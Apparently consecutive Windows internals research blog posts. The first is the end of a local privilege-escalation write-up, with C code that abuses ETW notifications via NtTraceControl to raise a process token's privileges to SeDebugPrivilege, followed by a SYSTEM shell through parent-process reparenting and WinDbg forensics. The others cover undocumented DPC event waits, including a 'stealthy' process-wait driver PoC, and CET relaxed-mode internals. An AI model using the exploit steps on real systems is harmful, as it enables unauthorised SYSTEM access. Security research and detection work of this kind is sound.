The two safest types to use are the last ones – EtwNotificationTypeReserved, which is not used by anything in the system that I could find, and EtwNotificationTypeCredentialUI, which is only used in notifications from consent.exe when it opens and closes the UAC popup, with no additional information sent (what is this notification good for? It’s unclear. And since there is no one listening for it I guess MS is not sure why it’s there either, or maybe they completely forgot it exists). For this exploit, I chose to use EtwNotificationTypeCredentialUI.

NotificationSize

As we’ve seen in NtTraceControl, the NotificationSize field has to be at least sizeof(ETWP_NOTIFICATION_HEADER). We have no need for any more than that, so we will make it this exact size.

ReplyObject

This will be the address that we want to increment + offsetof(OBJECT_HEADER, Body) – the OBJECT_HEADER structure contains the first 8 bytes of the object body within it, so we use the offset of the Body field rather than the size of the whole header, or we'd be off by 8 bytes. And to that we will add 2 more bytes to directly increment the third byte, which is the one we are interested in.

This is the only field we’ll need to change between our notifications – our first notification will increment Privileges.Present, and the second will increment Privileges.Enabled.

Other than DestinationGuid, which we already talked about a lot, the other fields don’t interest us and are not used in our code paths, so we can leave them at 0.

Building the Exploit

Now we have everything we need to try to trigger our exploit and get all those new privileges!

Registering Providers

First, we’ll register our 0x10 providers. This is pretty easy and there’s not much to explain here. For the registration to succeed we need to create a callback. This will be called whenever the provider is notified and can reply to the notification. I chose not to do anything in this callback, but it’s an interesting part of the mechanism that can be used to do some interesting things, such as using it as an injection technique.

But this blog post is already long enough so we will just define a minimal callback that does nothing:

ULONG
EtwNotificationCallback (
    _In_ ETW_NOTIFICATION_HEADER* NotificationHeader,
    _In_ PVOID Context
    )
{
    return 1;
}

And then register our 0x10 providers with the GUID we picked:

REGHANDLE regHandle;
for (int i = 0; i < 0x10; i++)
{
    result = EtwNotificationRegister(&EXPLOIT_GUID,
                                     EtwNotificationTypeCredentialUI,
                                     EtwNotificationCallback,
                                     NULL,
                                     &regHandle);
    if (!SUCCEEDED(result))
    {
        printf("Failed registering new provider\n");
        return 0;
    }
}

I’m reusing the same handle because I have no intention of closing these handles – closing them will lead to freeing the used slots, and we’ve already determined that this will lead to a system crash.

The Notification Header

After all this work, we finally have our providers and all the notification fields that we need, so we can build our notification header and trigger the exploit! Earlier I explained how to get the address of our token, and it mostly just involves a lot of code, so I won't show it here again – let's assume that getting the token address was successful and we have it.

First, we calculate the 2 addresses we will want to increment:

presentPrivilegesAddress = (PVOID)((ULONG_PTR)tokenAddress +
                           offsetof(TOKEN, Privileges.Present) + 2);
enabledPrivilegesAddress = (PVOID)((ULONG_PTR)tokenAddress +
                           offsetof(TOKEN, Privileges.Enabled) + 2);

Then we will define our data block and zero it:

ETWP_NOTIFICATION_HEADER dataBlock;
RtlZeroMemory(&dataBlock, sizeof(dataBlock));

And populate all the needed fields:

dataBlock.NotificationType = EtwNotificationTypeCredentialUI;
dataBlock.ReplyRequested = 2;
dataBlock.NotificationSize = sizeof(dataBlock);
dataBlock.ReplyObject = (PVOID)((ULONG_PTR)(presentPrivilegesAddress) +
                        offsetof(OBJECT_HEADER, Body));
dataBlock.DestinationGuid = EXPLOIT_GUID;

And finally, call NtTraceControl with our notification header (we could have passed dataBlock as the output buffer too, but I decided to define a separate ETWP_NOTIFICATION_HEADER and use that, for clarity):

status = NtTraceControl(EtwSendDataBlock,
                        &dataBlock,
                        sizeof(dataBlock),
                        &outputBuffer,
                        sizeof(outputBuffer),
                        &returnLength);

We will then repopulate the fields with the same values, set ReplyObject to (PVOID)((ULONG_PTR)(enabledPrivilegesAddress) + offsetof(OBJECT_HEADER, Body)) and call NtTraceControl again to increment our Enabled privileges.
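
For completeness, that second notification is just a repeat of the code above with a different target pointer:

// Repopulate the same fields as before, this time pointing ReplyObject at
// the Enabled bitmap instead of Present
dataBlock.NotificationType = EtwNotificationTypeCredentialUI;
dataBlock.ReplyRequested = 2;
dataBlock.NotificationSize = sizeof(dataBlock);
dataBlock.DestinationGuid = EXPLOIT_GUID;
dataBlock.ReplyObject = (PVOID)((ULONG_PTR)(enabledPrivilegesAddress) +
                        offsetof(OBJECT_HEADER, Body));

status = NtTraceControl(EtwSendDataBlock,
                        &dataBlock,
                        sizeof(dataBlock),
                        &outputBuffer,
                        sizeof(outputBuffer),
                        &returnLength);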

Then we look at our token:

And we have SeDebugPrivilege!

Now what do we do with it?

Using SeDebugPrivilege

Once you have SeDebugPrivilege you have access to any process in the system. This gives you plenty of different ways to run code as SYSTEM, such as injecting code to a system process.

I chose to use the technique that Alex and I demonstrated in faxhell – Creating a new process and reparenting it to have a non-suspicious system-level parent, which will make the new process run as SYSTEM. As a parent I chose to use the same one that we did in Faxhell – the DcomLaunch service.

The full explanation of this technique can be found in the blog post about faxhell, so I will just briefly explain the steps:

  1. Use the exploit to receive SeDebugPrivilege.
  2. Open the DcomLaunch service, query it to receive the PID and open the process with PROCESS_ALL_ACCESS.
  3. Initialize process attributes and pass in the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute and the handle to DcomLaunch to set it as the parent.
  4. Create a new process using these attributes.

I implemented all those steps and…

Got a cmd process running as SYSTEM under DcomLaunch!

Forensics

Since this exploitation method leaves queued notifications that will never get removed, it’s relatively easy to find in memory – if you know where to look.

We go back to our WinDbg command from earlier and parse the GUID table. This time we also add the head of the ETW_REG_ENTRY list for each GUID, and the number of entries in it:

dx -r0 @$GuidTable = ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpGuidHashTable
dx -g @$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid]).Where(list => list.Flink != &list).Select(list => (nt!_ETW_GUID_ENTRY*)(list.Flink)).Select(Entry => new { Guid = Entry->Guid, Refs = Entry->RefCount, SD = Entry->SecurityDescriptor, Reg = (nt!_ETW_REG_ENTRY*)Entry->RegListHead.Flink, RegCount = Debugger.Utility.Collections.FromListEntry(Entry->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Count()})

As expected, we can see here 3 GUIDs – the first one, that was already registered in the system the first time we checked, the second, which we are using for our exploit, and the test GUID, which we registered as part of our attempts.

Now we can use a second command to see who is using these GUIDs. Unfortunately, there is no nice way to view the information for all GUIDs at once, so we'll need to pick one at a time. When doing actual forensic analysis you'd have to look at all the GUIDs (and probably write a tool to do this automatically), but since we know which GUID our exploit is using we'll just focus on it.

We’ll save the GUID entry in slot 42:

dx -r0 @$exploitGuid = (nt!_ETW_GUID_ENTRY*)(@$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid])[42].Flink)

And print the information about all the registered instances in the list:

dx -g @$regEntries = Debugger.Utility.Collections.FromListEntry(@$exploitGuid->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Select(r => new {ReplyQueue = r.ReplyQueue, ReplySlot = r.ReplySlot, UsedSlots = r.ReplySlot->Where(s => s != 0).Count(), Caller = r.Caller, SessionId = r.SessionId, Process = r.Process, ProcessName = ((char[15])r.Process->ImageFileName)->ToDisplayString("s"), Callback = r.Callback, CallbackContext = r.CallbackContext})

We can see that all instances are registered by the same process (conveniently named "exploit_part_1"). This fact by itself is suspicious, since a process usually has no reason to register the same GUID more than once, and it tells us we should probably look further into this.

If we want to investigate these suspicious entries a bit more, we can look at one of the notification queues:

dx -g @$regEntries[0].ReplySlot

These look even more suspicious – their Flags are ETW_QUEUE_ENTRY_FLAG_HAS_REPLY_OBJECT (2) but their ReplyObject fields don’t look right – they are not aligned the way objects are supposed to be.

We can run !pool on one of the objects and see that this address is actually somewhere inside a token object:

And if we check the address of the token belonging to the exploit_part_1 process:

dx @$regEntries[0].Process->Token.Object & ~0xf
@$regEntries[0].Process->Token.Object & ~0xf : 0xffff908912ded0a0
? 0xffff908912ded112 - 0xffff908912ded0a0
Evaluate expression: 114 = 00000000`00000072

The address we see in the first ReplyObject is 0x72 bytes past the token address, so it is inside this process' token. Since a ReplyObject should point to an ETW registration object, and definitely not somewhere in the middle of a token, this is clearly pointing towards some suspicious behavior by this process.

Show Me The Code

The full PoC can be found in the GitHub repository.

Conclusion

One of the things I wanted to show in this blog post is that there is almost no such thing as a “simple” exploit anymore. And 5000 words later, I think this point should be clear enough. Even a vulnerability like this, which is pretty easy to understand and very easy to trigger, still takes a significant amount of work and understanding of internal Windows mechanisms to turn into an exploit that doesn’t immediately crash the system, and even more work to do anything useful with.

That being said, these kinds of exploits are the most fun – because they don't rely on any ROP or HVCI violations, and have nothing to do with XFG or CET or page tables or PatchGuard. Simple, effective, data-only attacks will always be the Achilles' heel of the security industry, and will most likely always exist in some form.

This post focused on how we can safely exploit this vulnerability, but once we got our privileges, we did pretty standard stuff with them. In future posts, I might showcase some other interesting things to do with arbitrary increments and token objects, which are more interesting and complicated, and maybe make attacks harder to detect too.


DPWs are the new DPCs : Deferred Procedure Waits in Windows 10 21H1

With the Windows 21H1 (Iron/“Fe”) feature complete deadline looming, the last few Dev Channel builds have had some very interesting changes and additions, which will probably require a few separate blog posts to cover fully. One of those was in a surprising part of the code – object wait dispatching.

The new build introduced a few new functions:

  • KeRegisterObjectDpc (despite the name, it’s an internal non-exported function)
  • ExQueueDpcEventWait
  • ExCancelDpcEventWait
  • ExCreateDpcEvent
  • ExDeleteDpcEvent

All those functions are part of a new and interesting piece of functionality – the ability to wait on an (event) object and have a DPC execute when it becomes signaled. Until now, if a driver wanted to wait on an object it had to do so synchronously – the current thread would be put in a wait state until the object being waited on was signaled, or the wait timed out (or an APC executed, if the wait was alertable). User-mode applications typically perform waits in the same manner; however, since Windows 8 they've also had the ability to perform asynchronous waits through the Thread Pool API. That functionality associates an I/O Completion Port with a "Wait Packet", obviating the need to have a waiting thread.

The change in 21H1, through the addition of these APIs, marks a major change for kernel-mode waits by introducing kernel-mode asynchronous waits: a driver can now supply a DPC that will be executed when the event object that is waited on is signaled all while continuing its execution in the meantime.

The Mechanism

To use this new capability, a driver must first  initialize a so-called “DPC Event”. To initialize this structure we have the new API ExCreateDpcEvent:

NTSTATUS
ExCreateDpcEvent (
    _Outptr_ PVOID *DpcEvent,
    _Outptr_ PKEVENT *Event,
    _In_ PKDPC Dpc
);

Internally, this allocates a new undocumented structure that I chose to call DPC_WAIT_EVENT:

typedef struct _DPC_WAIT_EVENT
{
    KWAIT_BLOCK WaitBlock;
    PKDPC Dpc;
    PKEVENT Event;
} DPC_WAIT_EVENT, *PDPC_WAIT_EVENT;

This API receives a DPC that the caller must have previously initialized with KeInitializeDpc (you can guess who spent a day debugging things by forgetting to do this), and in turn creates an event object and allocates a DPC_WAIT_EVENT structure that is returned to the caller, filling in a pointer to the caller’s DPC, the newly allocated event, and setting the wait block state to WaitBlockInactive.

Then, the driver needs to call the new ExQueueDpcEventWait function, passing in the structure:

BOOLEAN
ExQueueDpcEventWait (
    _In_ PDPC_WAIT_EVENT DpcEvent,
    _In_ BOOLEAN QueueIfSignaled
    )
{
    if (DpcEvent->WaitBlock.BlockState != WaitBlockInactive)
    {
        RtlFailFast(FAST_FAIL_INVALID_ARG);
    }
    return KeRegisterObjectDpc(DpcEvent->Event,
                               DpcEvent->Dpc,
                               &DpcEvent->WaitBlock,
                               QueueIfSignaled);
}

As can be seen, this function is very simple – it unpacks the structure and sends the contents to the internal KeRegisterObjectDpc:

BOOLEAN
KeRegisterObjectDpc (
    _In_ PVOID Object,
    _In_ PRKDPC Dpc,
    _In_ PKWAIT_BLOCK WaitBlock,
    _In_ BOOLEAN QueueIfSignaled
);

You might wonder, like me – doesn’t the “e” in “Ke” stand for “exported”? Was I lied to the whole time? Is this a mistake? Was this a last minute change? Does MS not have any design or code review? I’m as confused as you are.

But before talking about KeRegisterObjectDpc, we need to investigate another small detail. To enable this functionality, the KWAIT_BLOCK structure can now store a KDPC to queue, and the WAIT_TYPE enumeration has a new WaitDpc option:

typedef struct _KWAIT_BLOCK
{
    LIST_ENTRY WaitListEntry;
    UCHAR WaitType;
    volatile UCHAR BlockState;
    USHORT WaitKey;
#if defined(_WIN64)
    LONG SpareLong;
#endif
    union {
        struct KTHREAD* Thread;
        struct KQUEUE* NotificationQueue;
        struct KDPC* Dpc;
    };
    PVOID Object;
    PVOID SparePtr;
} KWAIT_BLOCK, *PKWAIT_BLOCK, *PRKWAIT_BLOCK;

typedef enum _WAIT_TYPE
{
    WaitAll,
    WaitAny,
    WaitNotification,
    WaitDequeue,
    WaitDpc,
} WAIT_TYPE;

Now we can look at KeRegisterObjectDpc, which is pretty simple and does the following:

  1. Initializes the wait block
    1. Sets the BlockState field to WaitBlockActive,
    2. Sets the WaitType field to WaitDpc
    3. Sets the Dpc field to point to the received DPC
    4. Sets the Object field to the received object.
  2. Raises the IRQL to DISPATCH_LEVEL
  3. Acquires the lock for the object, found in its DISPATCHER_HEADER.
  4. If the object is not signaled – inserts the wait block into the wait list for the object and releases the lock, then lowers the IRQL
  5. Otherwise, if the object is signaled:
    1. Satisfies the wait for the object, resetting the signal state as required for the object
    2. If the QueueIfSignaled parameter was set, inserts the wait block into the object's wait list anyway (as in step 4)
    3. Otherwise,
      1. Sets BlockState to WaitBlockInactive
      2. Queues the DPC
  • Releases the lock and calls KiExitDispatcher (which will lower the IRQL and make the DPC execute immediately).

Then the function returns. If the object was not signaled, the driver execution will continue and when the object gets signaled, the DPC will be executed. If the object is already signaled, the DPC will be executed immediately (unless the QueueIfSignaled parameter was set to TRUE)

If the wait is no longer needed, the driver should call ExCancelDpcEventWait to remove the wait block from the wait queue. And when the event is not needed it should call ExDeleteDpcEvent to dereference the event and free the opaque DPC_WAIT_EVENT structure.
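
Putting the whole lifecycle together, a minimal usage sketch looks roughly like this (none of these APIs are in the public headers, so their prototypes have to be declared manually; MyDpcRoutine is a placeholder DPC routine):

// Minimal lifecycle sketch based on the descriptions above; error handling omitted.
// In real code the KDPC and the DPC_WAIT_EVENT must stay valid for the lifetime
// of the wait.
KDPC dpc;
PKEVENT event;
PDPC_WAIT_EVENT dpcEvent;
NTSTATUS status;

KeInitializeDpc(&dpc, MyDpcRoutine, NULL);                  // must happen before ExCreateDpcEvent
status = ExCreateDpcEvent((PVOID*)&dpcEvent, &event, &dpc); // allocates the DPC_WAIT_EVENT + event object
if (NT_SUCCESS(status))
{
    //
    // Asynchronous wait: MyDpcRoutine runs when the event is signaled,
    // while this thread keeps executing
    //
    ExQueueDpcEventWait(dpcEvent, FALSE);

    //
    // ...later, once the wait and the event are no longer needed
    //
    ExCancelDpcEventWait(dpcEvent);
    ExDeleteDpcEvent(dpcEvent);
}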

Meanwhile, the various internal dispatcher functions that take care of signaling an object have been extended to handle the WaitDpc case – instead of unwaiting the thread (WaitAny/WaitAll), or waking up a queue waiter (WaitNotification), a call to KeInsertQueueDpc is now done for the WaitDpc case (since wait satisfaction is done at DISPATCH_LEVEL, the DPC will then immediately execute once KiExitDispatcher is called by one of these functions).

The Limitations

You might have noticed that while the functionality in KeRegisterObjectDpc is generic, all these structures and exported functions  only support an event object. Furthermore, when looking inside ExCreateDpcEvent, we can see that it only creates an event object:

status = ObCreateObject(KernelMode,
                        ExEventObjectType,
                        NULL,
                        KernelMode,
                        NULL,
                        sizeof(KEVENT),
                        0,
                        0,
                        &event);

But as KeRegisterObjectDpc suggests, an event is not the only object that can be asynchronously waited on. The usage of KiWaitSatisfyOther suggests that any generic dispatcher object, except for mutexes, which need to handle ownership rules, can be used. Since a driver might need to wait on a process, a thread, a semaphore, or any other object — why are we only allowed to wait on an event here?

The answer in this case is probably that this was not designed to be a generic feature available to all drivers. So far, I could only see one Windows component calling these new functions – Vid.sys (the Hyper-V Virtualization Infrastructure Driver). Digging deeper, it looks like it is using this new capability to implement the new WHvCreateTrigger API added to the documented Hyper-V Platform API in WinHvPlatform.h. "Triggers" are newly exposed 21H1 functionality for sending virtual interrupts to a Hyper-V partition. The importance of Microsoft's Azure/Hyper-V platform play is clearly evident here – low-level changes to the kernel dispatcher, for the first time in a decade, simply to optimize the performance of virtual machine-related APIs.

As such, since it is only designed to support this one specific case, this feature is built to only wait on an event object. But even with that in mind, the design is a bit funny – ExCreateDpcEvent will create an event object and return it to the caller, which then has to re-open it with ObOpenObjectByPointer to use it in any way, since most wait-related APIs require a HANDLE (as does exposing the object to user-mode, as Vid.sys intends to do). And we can see vid.sys doing exactly that:

Why not simply expose KeRegisterObjectDpc and let it receive an object pointer that will be waited on, since this function doesn’t care about the object type? Why do we even need a new structure to manage this information? I don’t know. The current implementation doesn’t seem like the most logical one, and it limits the feature significantly, but it is the Microsoft way.

If I had to guess, I would expect to see this feature changing in the future to support more object types as Microsoft internally finds more uses for asynchronous waits in the kernel. I will not be surprised to see an ExQueueDpcEventWaitEx function added soon… and perhaps documenting this API to 3rd parties.

But not all is lost. If you're willing to bend the rules a little and upset a few people in the OSR forums, you can wait on any non-mutex (dispatcher) object you want, simply by replacing the pointer inside the DPC_WAIT_EVENT structure that is returned to you. Neither ExQueueDpcEventWait nor KeRegisterObjectDpc cares which type of object is being passed in, as long as it's a legitimate dispatcher object. I'm sure there's an NT_ASSERT in the checked build, but it's not like those still exist.

The risk here (as OSR people will gladly tell you) is that the new structure is undocumented and might change with no warning, as are the functions handling it. So, replacing the pointer and hoping that the offset hasn’t changed and that the functions will not be affected by this change is a risky choice that is not recommended in a production environment. Now that I’ve said it, I have no doubt we will see crash dumps caused by AV products attempting to do exactly that, poorly.

PoC

To demonstrate how this mechanism works and how it can be used for objects other than events I wrote a small driver that registers a DPC that waits for a process to terminate.

On DriverEntry, this driver initializes a push lock that will be used later. It also registers a process creation callback:

NTSTATUS
DriverEntry (
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )
{
    DriverObject->DriverUnload = DriverUnload;
    ExInitializePushLock(&g_WaitLock);
    return PsSetCreateProcessNotifyRoutineEx(&CreateProcessNotifyRoutineEx, FALSE);
}

Whenever our CreateProcessNotifyRoutineEx callback is called, it checks if the new process name ends with “cmd.exe”:

VOID
CreateProcessNotifyRoutineEx (
    _In_ PEPROCESS Process,
    _In_ HANDLE ProcessId,
    _In_ PPS_CREATE_NOTIFY_INFO CreateInfo
    )
{
    NTSTATUS status;
    DECLARE_CONST_UNICODE_STRING(cmdString, L"cmd.exe");

    UNREFERENCED_PARAMETER(ProcessId);

    //
    // If process name is cmd.exe, create a dpc
    // that will wait for the process to terminate
    //
    if ((!CreateInfo) ||
        (!RtlSuffixUnicodeString(&cmdString, CreateInfo->ImageFileName, FALSE)))
    {
        return;
    }
    ...
}

If the process is cmd.exe, we will create a DPC_WAIT_EVENT structure that will wait for the process to be signaled, which happens when the process terminates. For the purpose of this PoC I wanted to keep things simple and avoid having to keep track of multiple wait blocks. So only the first cmd.exe process will be waited on and the rest will be ignored.

First, we need to declare some global variables for the important structures, as well as the lock that we initialized on DriverEntry and the DPC routine that will be called when the process terminates:

static KDEFERRED_ROUTINE DpcRoutine;
PDPC_WAIT_EVENT g_DpcWait;
EX_PUSH_LOCK g_WaitLock;
KDPC g_Dpc;
PKEVENT g_Event;

static
void
DpcRoutine (
    _In_ PKDPC Dpc,
    _In_ PVOID DeferredContext,
    _In_ PVOID SystemArgument1,
    _In_ PVOID SystemArgument2
    )
{
    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,
               "Process terminated\n");
}

Then, back in our process creation callback, we will initialize the DPC object and allocate a DPC_WAIT_EVENT structure using KeInitializeDpc and ExCreateDpcEvent. To avoid a race we will use our lock.

void
CreateProcessNotifyRoutineEx (
    ...
    )
{
    ...
    ExAcquirePushLockExclusive(&g_WaitLock);
    if (g_DpcWait == nullptr)
    {
        KeInitializeDpc(&g_Dpc, DpcRoutine, &g_Dpc);
        status = ExCreateDpcEvent(&g_DpcWait,&g_Event,&g_Dpc);
        if (!NT_SUCCESS(status))
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                       DPFLTR_ERROR_LEVEL,
                       "ExCreateDpcEvent failed with status: 0x%x\n",
                       status);
            ExReleasePushLockExclusive(&g_WaitLock);
            return;
        }
        ...
    }
    ExReleasePushLockExclusive(&g_WaitLock);
}

ExCreateDpcEvent creates an event object and places a pointer to it in our new DPC_WAIT_EVENT structure. But since we want to wait on a process, we need to replace that event pointer with the pointer to the EPROCESS of the new cmd.exe process. Then we can go on to queue our wait block for the process:

void
CreateProcessNotifyRoutineEx (
    _In_ PEPROCESS Process,
    ...
    )
{
    NTSTATUS status;
    //
    // Only wait on one process
    //
    ExAcquirePushLockExclusive(&g_WaitLock);
    if (g_DpcWait == nullptr)
    {
        KeInitializeDpc(&g_Dpc, DpcRoutine, &g_Dpc);
        status = ExCreateDpcEvent(&g_DpcWait, &g_Event, &g_Dpc);
        if (!NT_SUCCESS(status))
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                       DPFLTR_ERROR_LEVEL,
                       "ExCreateDpcEvent failed with status: 0x%x\n",
                       status);
            ExReleasePushLockExclusive(&g_WaitLock);
            return;
        }
        NT_ASSERT(g_DpcWait->Object == g_Event);
        g_DpcWait->Object = (PVOID)Process;
        ExQueueDpcEventWait(g_DpcWait, TRUE);
    }
    ExReleasePushLockExclusive(&g_WaitLock);
}

And that’s it! When the process terminates our DPC routine will be called, and we can choose to do whatever we want there:

The only other thing we need to remember is to clean up after ourselves before unloading, by setting the pointer back to the event (that we saved for that purpose), canceling the wait and deleting the DPC_WAIT_EVENT structure:

VOID
DriverUnload (
    _In_ PDRIVER_OBJECT DriverObject
    )
{
    UNREFERENCED_PARAMETER(DriverObject);

    PsSetCreateProcessNotifyRoutineEx(&CreateProcessNotifyRoutineEx, TRUE);

    //
    // Change the DPC_WAIT_EVENT structure to point back to the event,
    // cancel the wait and destroy the structure
    //
    if (g_DpcWait != nullptr)
    {
        g_DpcWait->Object = g_Event;
        ExCancelDpcEventWait(g_DpcWait);
        ExDeleteDpcEvent(g_DpcWait);
    }
}

Forensics

Apart from the legitimate uses of asynchronous wait for drivers, this is also a new and stealthy way to wait on all different kinds of objects without using other, more well-known ways that are easy to notice and detect, such as using process callbacks to wait on process termination.

The main way to detect whether someone is using this technique is to inspect the wait queues of objects in the system. For example, let’s use the Windbg Debugger Data Model to inspect the wait queues of all processes in the system. To get a nice table view we’ll only show the first wait block for each process, though of course that doesn’t give us the full picture:

dx -g @$procWaits = @$cursession.Processes.Where(p => (__int64)&p.KernelObject.Pcb.Header.WaitListHead != (__int64)p.KernelObject.Pcb.Header.WaitListHead.Flink).Select(p => Debugger.Utility.Collections.FromListEntry(p.KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry")[0]).Select(p => new { WaitType = p.WaitType, BlockState = p.BlockState, Thread = p.Thread, Dpc = p.Dpc, Object = p.Object, Name = ((char*)((nt!_EPROCESS*)p.Object)->ImageFileName).ToDisplayString("sb")})

We mostly see here waits of type WaitNotification (2), which is what we expect to see – user-mode threads asynchronously waiting for processes to exit. Now let’s run our driver and run a new query which will only pick processes that have wait blocks with type WaitDpc (4):

dx @$dpcwaits = @$cursession.Processes.Where(p => (__int64)&p.KernelObject.Pcb.Header.WaitListHead != (__int64)p.KernelObject.Pcb.Header.WaitListHead.Flink && Debugger.Utility.Collections.FromListEntry(p.KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry").Where(p => p.WaitType == 4).Count() != 0)

[0x6b0]          : cmd.exe [Switch To]

Now we only get one result – the cmd.exe process that our driver is waiting on. Now we can dump its whole wait queue and see who is waiting on it. We will also use a little helper function to show us the symbol that the DPC’s DeferredRoutine is pointing to:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x")))

dx -g Debugger.Utility.Collections.FromListEntry(@$dpcwaits.First().KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry").Select(p => new { WaitType = p.WaitType, BlockState = p.BlockState, Thread = p.Thread, Dpc = p.Dpc, Object = p.Object, Name = ((char*)((nt!_EPROCESS*)p.Object)->ImageFileName).ToDisplayString("sb"), DpcTarget = (@$getsym(p.Dpc->DeferredRoutine))[0]})

Only one wait block is queued for this process, and it’s pointing to our driver!

This analysis process can also be converted to JavaScript to have a bit more control over the presentation of the results, or to C to automatically check the wait queues of different objects (keep in mind it is extremely unsafe to do this at runtime due to the lock synchronization required – using the COM/C++ Debugger API to do forensics on a memory dump or live dump is the preferred way to go).

Conclusion

This new addition to the Windows kernel is exciting since it allows the option of asynchronous waits for drivers, a capability that only existed for user-mode until now. I hope we will see this extended to properly support more object types soon, making this feature generically useful to all drivers in various cases.

The implementation of all the functions discussed in this post can be found here.


CET Updates – CET on Xanax

Windows 21H1 CET Improvements

Since Alex and I published our first analysis of CET, Windows’ support for user-mode CET has received a few important changes that should be noted. We can easily spot most of them by looking at the changes to the MitigationFlags2 field of the EPROCESS when comparing Windows 10 Build 19013 with 20226:

There are a lot of new mitigation flags here, and a few of them are related to CET:

  • CetUserShadowStackStrictMode – annoyingly, this does not mean the same thing as Strict CFG. Strict CET means that CET will be enforced for the process, regardless of whether it’s compiled as CET compatible or not.
  • BlockNonCetBinaries – as the name suggests, this feature blocks binaries that were not compiled with CET support from being loaded into the process — just like Strict CFG.
  • CetDynamicApisOutOfProcOnly – At first CET was supposed to block all non-approved RIP changes. That was too much, so it was toned down to only block most non-approved RIP targets. Then MS remembered dynamic memory, and couldn’t force dynamic memory to comply with CET but insisted that allowing dynamic targets was only supported out of proc, so not really a security risk. And now it seems that in proc dynamic APIs are allowed by default and processes have to manually opt-out of that by setting this flag. In their defense, the flag is already set for most important Windows processes such as winlogon.exe, lsass.exe, csrss.exe and svchost.exe. But I’m sure that’s OK and we’ll never see CET bypasses abusing dynamic APIs in proc.
  • UserCetSetContextIpValidationRelaxedMode – Even after all the adjustments that were made in order to not break any existing code, CET was still a bit too anxious, resulting in this new mitigation. This new flag has a pretty curious name that might draw your attention. If it did – good! Because this is the CET feature that this blog post will focus on.

But even without knowing the purpose of any of those, the amount of new CET flags alone hints that we are not expected to see CET being fully enforced across the system any time soon.

Relaxed Mode

The least obvious of those new flags is the “relaxed mode” option. Was CET too anxious to handle 2020 and needed a bit of a break from everything? Well if it did, I think we can all relate to that and shouldn’t judge too harshly.

This flag can be set on process creation, by calling UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY and PROCESS_CREATION_MITIGATION_POLICY2_USER_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE as the mitigation policy flag.
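
To show what that looks like in practice, here is a rough user-mode sketch (error handling omitted; the policy flag name is the one mentioned above, though recent SDK headers may spell it with an _ALWAYS_ON suffix, so verify against winbase.h):

STARTUPINFOEXW startupInfo = { 0 };
PROCESS_INFORMATION processInfo = { 0 };
SIZE_T attributeListSize = 0;
DWORD64 mitigationPolicy[2] = { 0 };

startupInfo.StartupInfo.cb = sizeof(startupInfo);

//
// The second 64-bit value of the attribute holds the
// PROCESS_CREATION_MITIGATION_POLICY2_* flags
//
mitigationPolicy[1] = PROCESS_CREATION_MITIGATION_POLICY2_USER_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE;

InitializeProcThreadAttributeList(NULL, 1, 0, &attributeListSize);
startupInfo.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(),
                                                                      0,
                                                                      attributeListSize);
InitializeProcThreadAttributeList(startupInfo.lpAttributeList, 1, 0, &attributeListSize);
UpdateProcThreadAttribute(startupInfo.lpAttributeList,
                          0,
                          PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY,
                          mitigationPolicy,
                          sizeof(mitigationPolicy),
                          NULL,
                          NULL);
CreateProcessW(L"C:\\Windows\\System32\\notepad.exe",
               NULL,
               NULL,
               NULL,
               FALSE,
               EXTENDED_STARTUPINFO_PRESENT,
               NULL,
               NULL,
               &startupInfo.StartupInfo,
               &processInfo);
DeleteProcThreadAttributeList(startupInfo.lpAttributeList);
HeapFree(GetProcessHeap(), 0, startupInfo.lpAttributeList);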

It can also be set with a currently-undocumented linker flag, which will set the new IMAGE_DLLCHARACTERISTICS_EX_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE value in the PE header information (see the end of the post for the definition).

Once the flag is set, it is only used in two places – KeVerifyContextIpForUserCet and KiContinuePreviousModeUser. Both read it from the EPROCESS and pass a Boolean value into KiVerifyContextIpForUserCet to indicate whether it’s enabled or not. Inside KiVerifyContextIpForUserCet we can see this new addition that checks this argument:

RtlZeroMemory(&unwindState, sizeof(unwindState));
if (continueType == KCONTINUE_UNWIND)
{
    status = RtlVerifyUserUnwindTarget(userRip, KCONTINUE_UNWIND, &unwindState);
    if (NT_SUCCESS(status))
    {
        return status;
    }
}

if ((RelaxedMode != FALSE) && (continueType != KCONTINUE_RESUME))
{
    if (unwindState.CheckedLoadConfig == FALSE)
    {
        status = RtlGetImageBaseAndLoadConfig(userRip, &unwindState.ImageBase, &unwindState.LoadConfig);
        unwindState.CheckedLoadConfig = NT_SUCCESS(status) ? TRUE : unwindState.CheckedLoadConfig;
    }

    if (unwindState.CheckedLoadConfig != FALSE)
    {
        if (unwindState.ImageBase != NULL)
        {
            __try
            {
                ProbeForRead(unwindState.LoadConfig,
                             RTL_SIZEOF_THROUGH_FIELD(IMAGE_LOAD_CONFIG_DIRECTORY64, GuardEHContinuationCount),
                             sizeof(UCHAR));

                if ((unwindState.LoadConfig != NULL) &&
                    (unwindState.LoadConfig->Size >= RTL_SIZEOF_THROUGH_FIELD(IMAGE_LOAD_CONFIG_DIRECTORY64, GuardEHContinuationCount)) &&
                    (BooleanFlagOn(unwindState.LoadConfig->GuardFlags, IMAGE_GUARD_EH_CONTINUATION_TABLE_PRESENT)))
                {
                    goto CheckAddressInShadowStack;
                }
            }
            __except (EXCEPTION_EXECUTE_HANDLER)
            {
                goto CheckAddressInShadowStack;
            }
